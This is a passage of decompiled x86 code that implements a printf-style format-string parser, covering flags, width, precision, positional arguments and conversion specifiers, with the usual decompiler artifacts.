															L110:
															_t595 = _t616;
															goto L111;
														}
														_t597 =  *_t471;
														_t576 = _t575 - 0x30;
														_t472 = 0;
														__eflags = _t597;
														if(_t597 > 0) {
															_t472 = _t597 + _t597 * 4 + _t597 + _t597 * 4;
															__eflags = _t472;
														}
														 *( *(_t667 - 0x78)) =  &(_t472[_t576]);
														_t595 = _t616;
														goto L111;
													}
													 *(_t667 - 0x70) = 1;
													goto L185;
												}
												_t458 = _t467 & 0x000000ff;
												switch( *((intOrPtr*)((_t467 & 0x000000ff) * 4 +  &M004F6020))) {
													case 0:
														__ebx =  *(__ebp - 0x70);
														__eflags = __ebx;
														if(__ebx != 0) {
															goto L110;
														}
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000040;
														__ecx = __edx;
														goto L111;
													case 1:
														goto L181;
													case 2:
														__eax =  *(__ebp - 0x70);
														__eflags = __eax;
														if(__eax != 0) {
															goto L110;
														}
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000800;
														__ecx = __edx;
														goto L111;
													case 3:
														goto L116;
													case 4:
														__eax =  *(__ebp - 0x70);
														__eflags = __eax;
														if(__eax != 0) {
															goto L110;
														}
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000001;
														__ecx = __edx;
														goto L111;
													case 5:
														__eax =  *(__ebp - 0x78);
														__eflags = __eax;
														if(__eax == 0) {
															goto L145;
														}
														__eflags =  *(__ebp - 0x70) & 0x00000005;
														if(( *(__ebp - 0x70) & 0x00000005) != 0) {
															 *(__ebp - 0x78) = 0;
															goto L145;
														}
														__eax =  *(__ebp - 0x6c);
														__eflags =  *(__ebp - 0x6c);
														if(__eflags == 0) {
															L229:
															__eax =  *(__ebp + 0x18);
															__ecx =  *(__ebp - 0x78);
															_t392 = __ebp + 0x18;
															 *_t392 =  &(( *(__ebp + 0x18))[4]);
															__eflags =  *_t392;
															__eax =  *( *(__ebp + 0x18));
															 *__ecx = __eax;
															L230:
															__eflags = __eax;
															 *(__ebp - 0x78) = 0;
															if(__eax >= 0) {
																goto L110;
															}
															__eax =  *(__ebp - 0x70);
															__eflags = __eax;
															if(__eax != 0) {
																 *(__ebp - 0x3c) = 0xffffffff;
																__ecx = __edx;
															} else {
																 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000400;
																 *(__ebp - 0x40) =  ~( *(__ebp - 0x40));
																__ecx = __edx;
																 *(__ebp - 0x78) = __eax;
															}
															goto L111;
														}
														__eax = __ebp + 0x14;
														__eax = L004273E0(__ebp + 0x14, __eflags);
														__eflags = __eax;
														if(__eax <= 0) {
															__edx =  *(__ebp + 0x14);
															goto L229;
														}
														__ecx =  *(__ebp - 0x80);
														__edx =  *(__ebp + 0x14);
														__eax =  *( *(__ebp - 0x80) + __eax * 4 - 4);
														__ecx =  *(__ebp - 0x78);
														__eax =  *__eax;
														 *__ecx = __eax;
														goto L230;
													case 6:
														__eax =  *(__ebp - 0x70);
														__eflags = __eax;
														if(__eax != 0) {
															goto L110;
														}
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000100;
														__ecx = __edx;
														goto L111;
													case 7:
														__eax =  *(__ebp - 0x70);
														__eflags = __eax;
														if(__eax != 0) {
															goto L110;
														}
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000400;
														__ecx = __edx;
														goto L111;
													case 8:
														__eflags =  *(__ebp - 0x70) - 1;
														if( *(__ebp - 0x70) <= 1) {
															__eax = __ebp - 0x3c;
															 *(__ebp - 0x3c) = 0;
															 *(__ebp - 0x70) = 2;
															__ecx = __edx;
															 *(__ebp - 0x78) = __eax;
															goto L111;
														}
														goto L145;
													case 9:
														__ecx =  *(__ebp - 0x70);
														__eflags = __ecx;
														if(__ecx == 0) {
															 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000200;
															__ecx = __edx;
															goto L111;
														}
														__eflags =  *(__ebp - 0x70) - 4;
														if( *(__ebp - 0x70) != 4) {
															goto L205;
														}
														goto L115;
													case 0xa:
														__eax =  *(__ebp - 0x44);
														__eflags = __al & 0x00000004;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) == 0) {
															goto L168;
														}
														goto L164;
													case 0xb:
														 *(__ebp - 0x3c) = 0xffffffff;
														goto L162;
													case 0xc:
														__eax =  *(__ebp - 0x44);
														__eflags = __al & 0x00000004;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) != 0) {
															goto L136;
														}
														goto L160;
													case 0xd:
														__eax =  *(__ebp - 0x44);
														__eflags = __al & 0x00000004;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) != 0) {
															goto L134;
														}
														goto L158;
													case 0xe:
														__eax =  *(__ebp - 0x44);
														__eflags = __al & 0x00000004;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) != 0) {
															goto L132;
														}
														goto L166;
													case 0xf:
														__eax = __ebp + 0x14;
														 *(__ebp + 0x14) = __ecx;
														__eax = E00426D00(__ebp + 0x14);
														__eflags = __ebx - 0x6c;
														 *(__ebp - 0x74) = __eax;
														__edx =  *(__ebp + 0x14);
														if(__ebx != 0x6c) {
															L145:
															 *(__ebp - 0x70) = 4;
															__ecx = __edx;
															goto L111;
														}
														__eflags =  *0x536a51 & 0x00000001;
														if(( *0x536a51 & 0x00000001) == 0) {
															goto L145;
														}
														__eflags = __eax - 2;
														if(__eax != 2) {
															goto L145;
														}
														 *(__ebp - 0x74) = 2;
														goto L109;
													case 0x10:
														L109:
														_t147 = __ebp - 0x44;
														 *_t147 =  *(__ebp - 0x44) | 0x00000004;
														__eflags =  *_t147;
														 *(__ebp - 0x70) = 4;
														goto L110;
													case 0x11:
														L210:
														__eax =  *(__ebp + 0x18);
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__ebx =  *( *(__ebp + 0x18));
														__eflags = __ebx;
														if(__eflags == 0) {
															__ebx = L"(null)";
														}
														__eax = wcslen(__ebx);
														__ecx = __ebp - 0x48;
														__edx = __eax;
														__eax = __ebx;
														__eax = L00427040(__ebx, __ecx, __edx, __eflags);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x12:
														__eflags =  *(__ebp - 0x74) - 3;
														__eax =  *(__ebp + 0x18);
														if( *(__ebp - 0x74) == 3) {
															__edx = __eax[4];
															__eax =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
															 *(__ebp - 0x50) = __eax;
															 *(__ebp - 0x4c) = __edx;
														} else {
															__eflags =  *(__ebp - 0x74) - 2;
															if( *(__ebp - 0x74) == 2) {
																 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
																__eax =  *__eax;
																 *(__ebp - 0x4c) = 0;
																 *(__ebp - 0x50) = __eax;
															} else {
																 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
																__eflags =  *(__ebp - 0x74) - 1;
																__eax =  *__eax;
																 *(__ebp - 0x4c) = 0;
																 *(__ebp - 0x50) = __eax;
																if( *(__ebp - 0x74) == 1) {
																	__eax =  *(__ebp - 0x50) & 0x0000ffff;
																	 *(__ebp - 0x4c) = 0;
																	 *(__ebp - 0x50) =  *(__ebp - 0x50) & 0x0000ffff;
																} else {
																	__eflags =  *(__ebp - 0x74) - 4;
																	if( *(__ebp - 0x74) == 4) {
																		__eax =  *(__ebp - 0x50) & 0x000000ff;
																		 *(__ebp - 0x4c) = 0;
																		 *(__ebp - 0x50) =  *(__ebp - 0x50) & 0x000000ff;
																	}
																}
															}
														}
														__eflags = __ebx - 0x75;
														if(__ebx == 0x75) {
															goto L141;
														} else {
															__edx =  *(__ebp - 0x50);
															__ecx =  *(__ebp - 0x4c);
															__eax = __ebp - 0x48;
															 *__esp = __ebp - 0x48;
															__eax = __ebx;
															__eax = E00428560(__ebx, __ecx,  *(__ebp - 0x50));
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
													case 0x13:
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eflags = __al & 0x00000004;
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) != 0) {
															L164:
															__fp0 = [tword [eax];
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
															__eax = __ebp - 0x48;
															[tword [esp] = [tword [eax];
															__eax = L00427FC0(__ebp - 0x48);
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														L168:
														__fp0 =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														__eax = __ebp - 0x48;
														[tword [esp] = __fp0;
														__eax = L00427FC0(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x14:
														__eax =  *(__ebp - 0x74);
														 *(__ebp - 0x3c) = 0xffffffff;
														__eax =  *(__ebp - 0x74) - 2;
														__eflags =  *(__ebp - 0x74) - 2 - 1;
														if(__eflags <= 0) {
															L162:
															__eax =  *(__ebp + 0x18);
															__ecx = __ebp - 0x48;
															__edx = 1;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__eax =  *( *(__ebp + 0x18));
															 *(__ebp - 0x50) = __ax;
															__eax = __ebp - 0x50;
															__eax = L00427040(__ebp - 0x50, __ecx, 1, __eflags);
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														__eax =  *(__ebp + 0x18);
														__ecx = __ebp - 0x48;
														__edx = 1;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__eax =  *( *(__ebp + 0x18));
														 *(__ebp - 0x50) = __al;
														__eax = __ebp - 0x50;
														__eax = L00427160(__ebp - 0x50, __ecx, 1);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x15:
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000080;
														__eflags =  *(__ebp - 0x74) - 3;
														__eax =  *(__ebp + 0x18);
														if( *(__ebp - 0x74) == 3) {
															__edx = __eax[4];
															__eax =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
															 *(__ebp - 0x50) = __eax;
															 *(__ebp - 0x4c) = __edx;
														} else {
															__eflags =  *(__ebp - 0x74) - 2;
															if( *(__ebp - 0x74) == 2) {
																 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
																__eax =  *__eax;
																 *(__ebp - 0x50) = __eax;
																 *(__ebp - 0x4c) = __eax;
															} else {
																 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
																__eax =  *__eax;
																 *(__ebp - 0x50) = __eax;
																__eax = __eax >> 0x1f;
																__eflags =  *(__ebp - 0x74) - 1;
																 *(__ebp - 0x4c) = __eax;
																if( *(__ebp - 0x74) == 1) {
																	__eax =  *(__ebp - 0x50);
																	 *(__ebp - 0x50) = __eax;
																	 *(__ebp - 0x4c) = __eax;
																} else {
																	__eflags =  *(__ebp - 0x74) - 4;
																	if( *(__ebp - 0x74) == 4) {
																		__eax =  *(__ebp - 0x50);
																		 *(__ebp - 0x50) = __eax;
																		 *(__ebp - 0x4c) = __eax;
																	}
																}
															}
														}
														L141:
														__edx =  *(__ebp - 0x4c);
														__eax =  *(__ebp - 0x50);
														__ecx = __ebp - 0x48;
														__eax = L00427570( *(__ebp - 0x50), __ecx,  *(__ebp - 0x4c));
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x16:
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eflags = __al & 0x00000004;
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) == 0) {
															L160:
															__fp0 =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
															__eax = __ebp - 0x48;
															[tword [esp] = __fp0;
															__eax = L00427CC0(__ebp - 0x48);
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														L136:
														__fp0 = [tword [eax];
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
														__eax = __ebp - 0x48;
														[tword [esp] = [tword [eax];
														__eax = L00427CC0(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x17:
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eflags = __al & 0x00000004;
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) == 0) {
															L158:
															__fp0 =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
															__eax = __ebp - 0x48;
															[tword [esp] = __fp0;
															__eax = L00427D70(__ebp - 0x48);
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														L134:
														__fp0 = [tword [eax];
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
														__eax = __ebp - 0x48;
														[tword [esp] = [tword [eax];
														__eax = L00427D70(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x18:
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eflags = __al & 0x00000004;
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
														__eax =  *(__ebp + 0x18);
														if((__al & 0x00000004) == 0) {
															L166:
															__fp0 =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
															__eax = __ebp - 0x48;
															[tword [esp] = __fp0;
															__eax = L00427E40(__ebp - 0x48);
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														L132:
														__fp0 = [tword [eax];
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
														__eax = __ebp - 0x48;
														[tword [esp] = [tword [eax];
														__eax = L00427E40(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x19:
														__eflags =  *(__ebp - 0x74) - 4;
														__eax =  *(__ebp + 0x18);
														if( *(__ebp - 0x74) == 4) {
															__edx =  *(__ebp - 0x30);
															__eax =  *__eax;
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															 *__eax = __dl;
															__edx =  *(__ebp + 0x14);
															goto L85;
														}
														__eflags =  *(__ebp - 0x74) - 1;
														if( *(__ebp - 0x74) == 1) {
															__eax =  *__eax;
															__ecx =  *(__ebp - 0x30);
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															 *__eax = __cx;
															goto L85;
														}
														__eflags =  *(__ebp - 0x74) - 2;
														if( *(__ebp - 0x74) == 2) {
															L130:
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__ecx =  *(__ebp - 0x30);
															__eax =  *__eax;
															 *__eax = __ecx;
															goto L85;
														}
														__eflags =  *(__ebp - 0x74) - 3;
														if( *(__ebp - 0x74) == 3) {
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__ecx =  *(__ebp - 0x30);
															__eax =  *__eax;
															 *__eax = __ecx;
															__ecx = __ecx >> 0x1f;
															__eax[4] = __ecx;
															goto L85;
														}
														goto L130;
													case 0x1a:
														__edx =  *(__ebp - 0x70);
														__eflags =  *(__ebp - 0x70);
														if( *(__ebp - 0x70) == 0) {
															__eax =  *(__ebp - 0x7c);
															__eflags = __eax -  *(__ebp - 0x44);
															if(__eax ==  *(__ebp - 0x44)) {
																__ah = __ah | 0x00000002;
																 *(__ebp - 0x3c) = 8;
																 *(__ebp - 0x44) = __eax;
															}
														}
														__eax =  *(__ebp + 0x18);
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__eax =  *( *(__ebp + 0x18));
														 *(__ebp - 0x4c) = 0;
														__ecx =  *(__ebp - 0x4c);
														 *(__ebp - 0x50) =  *( *(__ebp + 0x18));
														__eax = __ebp - 0x48;
														__edx =  *(__ebp - 0x50);
														 *__esp = __ebp - 0x48;
														__eax = 0x78;
														__eax = E00428560(0x78, __ecx,  *(__ebp - 0x50));
														__edx =  *(__ebp + 0x14);
														goto L85;
													case 0x1b:
														 *(__ebp - 0x74) =  *(__ebp - 0x74) - 2;
														__eflags =  *(__ebp - 0x74) - 2 - 1;
														if( *(__ebp - 0x74) - 2 <= 1) {
															goto L210;
														}
														__eax =  *(__ebp + 0x18);
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__ebx =  *( *(__ebp + 0x18));
														__eflags = __ebx;
														if(__ebx == 0) {
															__edx = 6;
															__eax = "(null)";
														} else {
															__edx = strlen(__ebx);
															__eax = __ebx;
														}
														__ecx = __ebp - 0x48;
														__eax = L00427160(__eax, __ecx, __edx);
														__edx =  *(__ebp + 0x14);
														goto L85;
												}
												L111:
												__eflags =  *_t595;
											} while ( *_t595 != 0);
											goto L112;
										}
									}
									__eflags =  *(_t667 - 0x6c);
									if( *(_t667 - 0x6c) == 0) {
										L98:
										 *_t669 =  *(_t667 - 0x1c);
										free(??);
										return  *((intOrPtr*)(_t667 - 0x30));
									}
									do {
										_t640 = _t640 - 1;
										_t134 =  &(1[_t640]); // 0xffffffff
										__eflags = _t134;
									} while (_t134 > 0);
									goto L98;
								}
							}
							__eflags = _t654 - _t539;
							if(_t654 < _t539) {
								_t654 = _t539;
							}
							_t541 =  *(_t667 - 0x58);
							_t587 =  &(_t541[1]);
							 *(_t667 - 0x58) = _t587;
							_t609 = _t541[1] & 0x000000ff;
							L70:
							__eflags = _t609 - 0x2e;
							if(_t609 != 0x2e) {
								L75:
								E00426D00(_t667 - 0x58);
								_t544 =  *( *(_t667 - 0x58));
								 *(_t667 - 0x74) = _t544;
								_t669[1] = _t544;
								 *_t669 = "aAeEfFgGcCdiouxXnpsS";
								_t545 = strchr(??, ??);
								__eflags = _t545;
								_t610 =  *(_t667 - 0x74) & 0x000000ff;
								if(_t545 == 0) {
									L80:
									__eflags = _t610 - 0x25;
									if(_t610 != 0x25) {
										L16:
										_t590 = _t657;
										_t657 =  *(_t667 - 0x70);
										 *(_t667 - 0x58) = _t657;
										if( *_t590 != 0) {
											L3:
											if( *_t657 != 0x25) {
												_t572 = _t657;
												_t657 =  &(1[_t657]);
												L2:
												 *(_t667 - 0x58) = _t657;
												if( *_t572 == 0) {
													goto L18;
												}
												goto L3;
											}
											_t532 =  &(1[_t657]);
											 *(_t667 - 0x70) = _t532;
											 *(_t667 - 0x58) = _t532;
											_t534 = L00427360(_t667 - 0x58);
											_t654 = _t534;
											if(_t534 != 0) {
												_t587 =  &(( *(_t667 - 0x58))[1]);
												 *(_t667 - 0x58) = _t587;
												continue;
											}
											_t591 =  *(_t667 - 0x58);
											_t611 =  *_t591 & 0x000000ff;
											if(_t611 == 0x24) {
												goto L225;
											} else {
												 *(_t667 - 0x74) = _t657;
												_t666 = _t611;
												L8:
												 *_t669 = "+-\' 0#";
												_t655 = _t666;
												_t669[1] = _t655;
												if(strchr(??, ??) != 0) {
													_t591 =  &(_t591[1]);
													__eflags = _t591;
													_t666 =  *_t591 & 0x000000ff;
													goto L8;
												}
												_t612 = _t666;
												_t657 =  *(_t667 - 0x74);
												if(_t612 == 0x2a) {
													_t612 = _t591[1] & 0x000000ff;
													_t591 =  &(_t591[1]);
													L12:
													if(_t612 == 0x2e) {
														_t558 = _t591[1];
														__eflags = _t558 - 0x2a;
														if(_t558 == 0x2a) {
															_t591 =  &(_t591[2]);
															goto L13;
														}
														_t591 =  &(_t591[1]);
														__eflags = _t558 - 0x30 - 9;
														if(_t558 - 0x30 > 9) {
															goto L13;
														}
														do {
															_t591 =  &(_t591[1]);
															__eflags =  *_t591 - 0x30 - 9;
														} while ( *_t591 - 0x30 <= 9);
													}
													L13:
													 *(_t667 - 0x58) = _t591;
													E00426D00(_t667 - 0x58);
													_t572 =  *(_t667 - 0x58);
													_t656 =  *_t572 & 0x000000ff;
													 *_t669 = "aAeEfFgGcCdiouxXnpsS";
													_t669[1] = _t656;
													_t563 = strchr(??, ??);
													if(_t563 == 0) {
														L15:
														if(_t656 == 0x25) {
															L79:
															_t657 =  &(_t572[1]);
															goto L2;
														}
														goto L16;
													}
													asm("cdq");
													_t613 = (_t613 & 0x00000007) + _t563 - "aAeEfFgGcCdiouxXnpsS" >> 3;
													if(_t613 != 0xffffffff) {
														goto L225;
													}
													goto L15;
												}
												_t10 = _t655 - 0x30; // -48
												_t613 = _t10;
												if(_t613 > 9) {
													goto L12;
												} else {
													goto L11;
												}
												do {
													L11:
													_t591 =  &(_t591[1]);
													_t569 =  *_t591;
													_t612 = _t569;
												} while (_t569 - 0x30 <= 9);
												goto L12;
											}
										} else {
											L18:
											_t594 =  *(_t667 - 0x6c);
											_t456 = E0041C220(0x12 + _t594 * 4 >> 4 << 4);
											_t640 = 0xffffffff;
											_t669 = _t669 - _t456;
											_t457 =  &(_t669[3]);
											 *(_t667 - 0x78) = _t457;
											 *(_t667 - 0x80) = _t457;
											if(_t594 == 0) {
												goto L84;
											} else {
												_t618 = _t594 + _t594;
												 *(_t667 - 0x88) = _t669;
												_t481 = E0041C220(_t618 + 0x10 >> 4 << 4);
												_t660 =  *(_t667 + 0x14);
												_t671 = _t669 - _t481;
												_t642 =  &(_t671[3]);
												 *(_t667 - 0x54) = _t660;
												_t482 = _t642;
												_t619 = _t618 + _t642;
												goto L20;
												L24:
												L24:
												if( *_t660 != 0x25) {
													_t577 = _t660;
													_t660 =  &(_t660[1]);
													__eflags = _t660;
												} else {
													goto L25;
												}
												L23:
												 *(_t667 - 0x54) = _t660;
												__eflags =  *_t577;
												if( *_t577 == 0) {
													L48:
													_t643 =  *(_t667 - 0x70);
													_t620 =  *(_t667 - 0x6c);
													_t483 = 0;
													while( *((short*)(_t643 + _t483 * 2)) != 0) {
														_t483 =  &(1[_t483]);
														if(_t483 < _t620) {
															continue;
														}
														_t661 =  *(_t667 - 0x6c);
														if(_t661 == 0) {
															L83:
															_t484 =  *(_t667 - 0x6c);
															_t669 =  *(_t667 - 0x88);
															_t108 = _t484 - 1; // -1
															_t640 = _t108;
															goto L84;
														}
														_t601 =  *(_t667 + 0x18);
														_t621 =  *(_t667 - 0x78);
														_t485 =  &(_t643[1]);
														_t662 =  &(_t643[1 + _t661 * 2]);
														do {
															_t578 =  *(_t485 - 1) & 0x000000ff;
															 *_t621 = _t601;
															if(_t578 != 1) {
																__eflags = _t578 - 3;
																if(_t578 == 3) {
																	L189:
																	_t601 =  &(_t601[4]);
																	goto L57;
																}
																_t579 =  *_t485 & 0x000000ff;
																__eflags = _t579 - 2;
																if(_t579 == 2) {
																	goto L189;
																}
																__eflags = _t579 - 3;
																if(_t579 != 3) {
																	goto L189;
																}
																L56:
																_t601 =  &(_t601[8]);
																__eflags = _t601;
																goto L57;
															}
															_t580 =  *_t485 & 0x000000ff;
															if(_t580 == 0x4c || ( *0x536a51 & 0x00000001) != 0 && _t580 == 2) {
																_t601 =  &(_t601[0xc]);
															} else {
																goto L56;
															}
															L57:
															_t485 =  &(_t485[2]);
															_t621 =  &(_t621[4]);
														} while (_t662 != _t485);
														goto L83;
													}
													 *(_t667 - 0x6c) = 0;
													goto L83;
												}
												goto L24;
												L25:
												_t486 =  &(_t660[1]);
												 *(_t667 - 0x84) = _t486;
												 *(_t667 - 0x54) = _t486;
												_t488 = L00427360(_t667 - 0x54);
												 *(_t667 - 0x74) = _t488;
												if(_t488 <= 0) {
													_t581 =  *(_t667 - 0x54);
													 *(_t667 - 0x74) = _t660;
													while(1) {
														_t644 =  *_t581 & 0x000000ff;
														 *_t671 = "+-\' 0#";
														_t663 = _t644;
														_t671[1] = _t663;
														_t490 = strchr(??, ??);
														__eflags = _t490;
														if(_t490 == 0) {
															break;
														}
														_t581 =  &(_t581[1]);
														__eflags = _t581;
													}
													_t602 = _t644;
													_t645 = _t663;
													_t660 =  *(_t667 - 0x74);
													__eflags = _t602 - 0x2a;
													if(_t602 == 0x2a) {
														_t602 = _t581[1] & 0x000000ff;
														_t581 =  &(_t581[1]);
														L202:
														__eflags = _t602 - 0x2e;
														if(_t602 == 0x2e) {
															_t491 = _t581[1];
															__eflags = _t491 - 0x2a;
															if(_t491 == 0x2a) {
																_t581 =  &(_t581[2]);
																goto L203;
															}
															_t581 =  &(_t581[1]);
															__eflags = _t491 - 0x30 - 9;
															if(_t491 - 0x30 > 9) {
																goto L203;
															}
															do {
																_t581 =  &(_t581[1]);
																__eflags =  *_t581 - 0x30 - 9;
															} while ( *_t581 - 0x30 <= 9);
														}
														L203:
														 *(_t667 - 0x54) = _t581;
														E00426D00(_t667 - 0x54);
														_t582 =  *(_t667 - 0x54);
														__eflags =  *_t582 - 0x25;
														if( *_t582 != 0x25) {
															goto L180;
														}
														goto L46;
													}
													__eflags = _t645 - 0x30 - 9;
													if(_t645 - 0x30 > 9) {
														goto L202;
													}
													do {
														_t581 =  &(_t581[1]);
														_t497 =  *_t581;
														_t602 = _t497;
														__eflags = _t497 - 0x30 - 9;
													} while (_t497 - 0x30 <= 9);
													goto L202;
												} else {
													 *(_t667 - 0x50) = 0;
													 *(_t667 - 0x4c) = 0;
													_t583 =  &(( *(_t667 - 0x54))[1]);
													 *(_t667 - 0x54) = _t583;
													L28:
													 *_t671 = "+-\' 0#";
													_t671[1] =  *_t583;
													if(strchr(??, ??) != 0) {
														_t583 =  &(_t583[1]);
														__eflags = _t583;
														goto L28;
													}
													 *(_t667 - 0x54) = _t583;
													_t603 =  *_t583 & 0x000000ff;
													if(_t603 == 0x2a) {
														 *(_t667 - 0x54) =  &(_t583[1]);
														_t503 = L00427360(_t667 - 0x54);
														__eflags = _t503;
														 *(_t667 - 0x50) = _t503;
														if(_t503 != 0) {
															_t504 =  *(_t667 - 0x54);
															_t583 =  &(_t504[1]);
															 *(_t667 - 0x54) = _t583;
															_t603 = _t504[1] & 0x000000ff;
														} else {
															_t583 =  *(_t667 - 0x54);
															 *(_t667 - 0x74) = 0;
															_t603 =  *_t583 & 0x000000ff;
														}
														L33:
														if(_t603 == 0x2e) {
															 *(_t667 - 0x54) =  &(_t583[1]);
															_t506 = _t583[1];
															__eflags = _t506 - 0x2a;
															if(_t506 == 0x2a) {
																 *(_t667 - 0x54) =  &(_t583[2]);
																_t508 = L00427360(_t667 - 0x54);
																__eflags = _t508;
																 *(_t667 - 0x4c) = _t508;
																if(_t508 == 0) {
																	E00426D00(_t667 - 0x54);
																	_t582 =  *(_t667 - 0x54);
																	_t604 =  *_t582 & 0x000000ff;
																	L179:
																	__eflags = _t604 - 0x25;
																	if(_t604 == 0x25) {
																		L46:
																		_t660 =  &(_t582[1]);
																		 *(_t667 - 0x54) = _t660;
																		if( *_t582 != 0) {
																			goto L24;
																		}
																		goto L48;
																	}
																	L180:
																	_t577 = _t660;
																	_t660 =  *(_t667 - 0x84);
																	goto L23;
																}
																 *(_t667 - 0x54) =  &(( *(_t667 - 0x54))[1]);
																goto L34;
															}
															_t586 =  &(_t583[2]);
															__eflags = _t506 - 0x30 - 9;
															if(_t506 - 0x30 > 9) {
																goto L34;
															} else {
																goto L214;
															}
															do {
																L214:
																_t527 = _t586;
																 *(_t667 - 0x54) = _t586;
																_t586 =  &(_t586[1]);
																__eflags =  *_t527 - 0x30 - 9;
															} while ( *_t527 - 0x30 <= 9);
															_t512 = E00426D00(_t667 - 0x54);
															__eflags = _t512 - 1;
															_t624 = _t512;
															if(_t512 != 1) {
																L35:
																if(_t512 == 4) {
																	L177:
																	_t582 =  *(_t667 - 0x54);
																	 *((intOrPtr*)(_t667 - 0x8c)) = 0;
																	__eflags =  *(_t667 - 0x74);
																	if( *(_t667 - 0x74) != 0) {
																		L37:
																		_t514 =  *_t582;
																		 *(_t667 - 0x8d) = _t514;
																		_t671[1] = _t514;
																		 *_t671 = "aAeEfFgGcCdiouxXnpsS";
																		_t515 = strchr(??, ??);
																		_t604 =  *(_t667 - 0x8d) & 0x000000ff;
																		if(_t515 == 0) {
																			goto L179;
																		}
																		_t651 =  &(1[(_t515 - "aAeEfFgGcCdiouxXnpsS" >> 0x0000001f & 0x00000007) + _t515 - "aAeEfFgGcCdiouxXnpsS" >> 3]);
																		if(_t651 <= 0) {
																			goto L179;
																		}
																		_t627 =  *((intOrPtr*)(_t667 - 0x8c));
																		 *(_t667 - 0x5c) = _t604;
																		_t664 = _t627;
																		 *((char*)(_t667 - 0x5b)) = _t627;
																		 *(_t667 - 0x84) = L00427410(_t667 - 0x5c);
																		_t628 =  &(( *(_t667 - 0x70))[ *(_t667 - 0x74) * 2 - 2]);
																		if( *_t628 != 0) {
																			 *(_t667 - 0x74) = _t628;
																			_t521 = L00427410(_t628);
																			_t628 =  *(_t667 - 0x74);
																			__eflags =  *(_t667 - 0x84) - _t521;
																			if( *(_t667 - 0x84) <= _t521) {
																				L41:
																				_t522 = _t667 - 0x50;
																				_t665 = _t667 - 0x48;
																				do {
																					_t629 =  *_t522;
																					_t608 = _t629 - 1;
																					 *_t522 = _t608;
																					if(_t629 > 0) {
																						_t630 =  *(_t667 - 0x70) + _t608 * 2;
																						if( *_t630 == 0) {
																							 *_t630 = 0x64;
																						}
																					}
																					_t522 =  &(_t522[1]);
																				} while (_t665 != _t522);
																				goto L46;
																			}
																		}
																		 *_t628 = _t651;
																		1[_t628] = _t664;
																		goto L41;
																	}
																	L178:
																	_t604 =  *_t582 & 0x000000ff;
																	goto L179;
																}
																 *((intOrPtr*)(_t667 - 0x8c)) = _t624;
																_t582 =  *(_t667 - 0x54);
																if( *(_t667 - 0x74) == 0) {
																	goto L178;
																}
																goto L37;
															}
															goto L177;
														}
														L34:
														_t512 = E00426D00(_t667 - 0x54);
														_t624 = _t512;
														if(_t512 == 1) {
															goto L177;
														}
														goto L35;
													}
													_t531 =  &(_t583[1]);
													if(_t603 - 0x30 <= 9) {
														do {
															 *(_t667 - 0x54) = _t531;
